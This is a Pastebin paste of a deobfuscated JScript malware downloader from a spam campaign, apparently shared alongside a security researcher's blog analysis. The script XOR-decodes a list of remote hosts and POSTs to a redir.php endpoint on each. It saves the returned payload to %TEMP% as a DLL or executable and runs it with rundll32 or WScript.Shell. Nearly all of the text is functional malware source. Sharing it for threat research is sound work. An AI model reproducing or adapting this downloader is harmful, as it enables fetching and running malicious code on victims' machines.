Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Deobfuscated JS file. Related blog post: http://bartblaze.blogspot.com/2015/11/a-quick-look-at-signed-spam-campaign.html
- kTEIfdmieLe8 = "au0911";
- function kTEIfdmieLe5(kTEIfdmieLe6) {
- return new ActiveXObject(kTEIfdmieLe6)
- };
- //// r6JLy1ijVPK
- //// 9eoOj
- //// b81c44zCnlGhKEGFeeq
- //// rMgXtx1jVd3fR2
- function kTEIfdmieLe(jhmpYYZvkuHWkW) {
- var kTEIfdmieLe4 = '9\x1a\x06f\x277w5T(*#E~###7\x19\x1d\x7f!7\x18#(,hd###2\x1d\x04~;)q?*9, \x0f#861\x0b\x0d}"4\x18/5&J\x198Y\x14\x0b\x14, \x5c\x06HB\x04\x1f\x06\x00\x1dg\x00\x05\x05\x0c=)\x1f\x10\x0bY\x0b\x1d\x0e\x17cB###.\x0d\x02`3/y8?\x276@\x0b;:ip###.\x1d\x09w$.e%5%<!\x1dZ4+7UO###3\x0b\x11s<%c 1\x27,#\x09Z86=UO###\x13, A\x13I]\x16wa'.split("###");
- //// U2gGxa
- //// v5ziPM5Ffk
- if (jhmpYYZvkuHWkW == "") {
- qKLIFbykNgG = "." + "d" + "l" + "l";
- } else {
- //// vuh4k5cITe
- //// KGZT1FZBTij1b
- qKLIFbykNgG = "." + "p" + "d" + "f";
- };
- for (var kRIBOVzKPU = 0; kRIBOVzKPU < kTEIfdmieLe4.length; kRIBOVzKPU++) {
- var veHnYKIWjraSp = kTEIfdmieLe5("WScript.Shell");
- //// nugznF3J0MgFJS6
- //// vAjJP
- sxyPxnzNV = veHnYKIWjraSp.ExpandEnvironmentStrings("%TEMP%") + "\\" + Math.round(1e8 * Math.random()) + qKLIFbykNgG;
- bypLmkq = false;
- kTEIfdmieLe0 = kTEIfdmieLe5("MSXML2.XMLHTTP");
- kTEIfdmieLe0.onreadystatechange = function() {
- if (4 == kTEIfdmieLe0.readyState && 200 == kTEIfdmieLe0.status) {
- var kTEIfdmieLe1 = kTEIfdmieLe5("ADODB.Stream");
- if (kTEIfdmieLe1.open(), kTEIfdmieLe1.type = 1, kTEIfdmieLe1.write(kTEIfdmieLe0.ResponseBody), 5e3 < kTEIfdmieLe1.size) {
- bypLmkq = true;
- kTEIfdmieLe1.position = 0;
- kTEIfdmieLe1.saveToFile(sxyPxnzNV, 2);
- try {
- if (jhmpYYZvkuHWkW == "") {
- veHnYKIWjraSp.Exec("rundll32 " + sxyPxnzNV + ", " + "DllRegisterServer");
- } else {
- veHnYKIWjraSp.Run(sxyPxnzNV, 1, 0);
- };
- } catch (kTEIfdmieLe2) {
- //// uLwp7f7a4iYX4fySkVO
- //// AHd01oKSom
- };
- //// XEJSIvJ50CMlcrXQ8W
- //// l9CA25oIEjMlpDI5
- }
- kTEIfdmieLe1.close()
- }
- //// vBJw1enjn3Wd7NMI
- //// FKMKp9Sj
- };
- try {
- //// 7bMQQ7rV
- //// 0DHAGjKxwXc0lyCHv
- //// KiU13559
- //// IaR517JKlqQjx2OsWqJs
- var jjxjYcRoh = 'zXE2rg6lzkenHtwd';
- var ICJCJreUdAoEDtN = kTEIfdmieLe4[kRIBOVzKPU];
- for (var byQIHsqp = "", MCwLh6 = 0, MCwLh7 = 0; MCwLh6 < ICJCJreUdAoEDtN.length; MCwLh6++) byQIHsqp += String.fromCharCode(ICJCJreUdAoEDtN.charCodeAt(MCwLh6) ^ jjxjYcRoh.charCodeAt(MCwLh7)), MCwLh7++, MCwLh7 == jjxjYcRoh.length && (MCwLh7 = 0);
- kTEIfdmieLe7 = "http://" + byQIHsqp + "/redir" + "." + "p" + "h" + "p";
- kTEIfdmieLe0.open("POST", kTEIfdmieLe7, false);
- kTEIfdmieLe0.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
- kTEIfdmieLe0.send("JreoOoOUJvvFay=" + Math.random() + "&jndj=" + kTEIfdmieLe8 + jhmpYYZvkuHWkW);
- } catch (kTEIfdmieLe3) {
- };
- if (bypLmkq) {
- break;
- };
- //// hqp4kZQUxwE
- //// KYrOhQ
- };
- };
- //// EQr7ksuiuwZdut45a
- //// jCStO3r
- kTEIfdmieLe("");
- kTEIfdmieLe("&ncm=sJzHYgdHnDZTwU");
- //// AEiSHdZq5
- //// nHsVUN2fzi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement